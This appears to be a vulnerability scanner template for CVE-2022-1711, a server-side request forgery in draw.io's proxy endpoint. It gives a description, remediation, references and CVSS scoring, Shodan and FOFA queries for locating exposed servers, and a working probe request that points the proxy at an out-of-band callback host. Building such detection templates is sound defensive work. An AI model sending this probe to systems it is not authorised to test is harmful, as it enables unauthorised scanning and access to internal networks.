id: CVE-2022-1711 info: name: draw.io < 18.0.5 - Server Side Request Forgery (SSRF) author: ritikchaddha severity: high description: | Server-Side Request Forgery (SSRF) vulnerability in draw.io (also known as diagrams.net) prior to version 18.0.5 allows attackers to bypass URL validation restrictions in the ProxyServlet component. The vulnerability exists because the application does not properly validate URLs passed to its proxy endpoint, allowing attackers to make requests to internal services or external servers. This can lead to unauthorized access to internal resources and potential data exfiltration. impact: | Unauthenticated attackers can perform SSRF attacks via the proxy endpoint to access internal resources, scan internal networks, or retrieve sensitive data from internal systems. remediation: | Update to draw.io/diagrams.net version 18.0.5 or later. The patch adds isLinkLocalAddress() checks to restrict proxy request destinations. If patching isn't possible, implement network controls to limit server connections to internal systems. reference: - https://huntr.dev/bounties/c32afff5-6ad5-4d4d-beea-f55ab4925797 - https://github.com/jgraph/drawio/commit/cf5c78aa0f3127fb10053db55b39f3017a0654ae - https://nvd.nist.gov/vuln/detail/CVE-2022-1711 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-1711 cwe-id: CWE-918 epss-score: 0.83223 epss-percentile: 0.99288 metadata: vendor: diagrams product: drawio verified: true shodan-query: html:"draw.io" fofa-query: body="draw.io" tags: cve,cve2022,ssrf,drawio,diagrams,jgraph,vuln http: - method: GET path: - "{{BaseURL}}/proxy?url=http://{{interactsh-url}}" matchers: - type: dsl dsl: - "status_code == 200" - "contains(interactsh_protocol, 'dns')" - "contains(content_type, 'application/octet-stream')" condition: and # digest: 4b0a00483046022100aacdc6fda7cea676c7147f943e98908c049261da20fe3953830d1f3d1575f9a2022100d7307e76c1e4f5cdd87fe3956cbbdd68f2d52ba70abd2a5261b9b9fbac16a30c:922c64590222798bb761d5b6d8e72950